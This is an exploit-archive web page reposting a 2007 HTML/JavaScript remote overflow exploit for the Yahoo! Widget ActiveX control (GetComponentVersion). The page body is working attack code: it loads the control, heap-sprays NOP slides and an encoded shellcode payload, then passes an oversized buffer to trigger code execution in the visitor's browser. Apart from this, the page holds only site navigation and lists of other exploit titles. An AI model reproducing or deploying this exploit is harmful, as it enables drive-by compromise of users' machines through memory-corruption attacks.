首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Yahoo! Widget < 4.0.5 GetComponentVersion() Remote Overflow Exploit 来源：www.vfocus.net 作者：lhoang 发布时间：2007-08-01   <html> <!-- +++++++++++++++++++++++ +Last Modified by lhoang8500++ +++++++++++++++++++++++ --> <html> <object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT> <SCRIPT language="javascript"> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000"); var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; }; var buffer =  unescape("%u0505"); while (buffer.length < 845)  buffer+='\x0A'; while (buffer.length< 1000) buffer+=unescape("%u0505"); target.GetComponentVersion(buffer); </script> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Asterisk < 1.2.22, 1.4.8 IAX2 ·MS Internet Explorer 6 DirectX ·Borland Interbase <= 2007 SP1 ·corehttp 0.5.3alpha (httpd) Re ·LinPHA <= 1.3.1 (new_images.ph ·Live for Speed S1/S2/Demo (.mp ·SimpleBlog 3.0 (comments_get.a ·paBugs <= 2.0 Beta 3 (main.php ·Nessus Vulnerability Scanner 3 ·PHP 5.x (win32service) Local S ·IBM AIX <= 5.3 sp6 ftp gets() ·CHILKAT ASP String (CkString.d   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved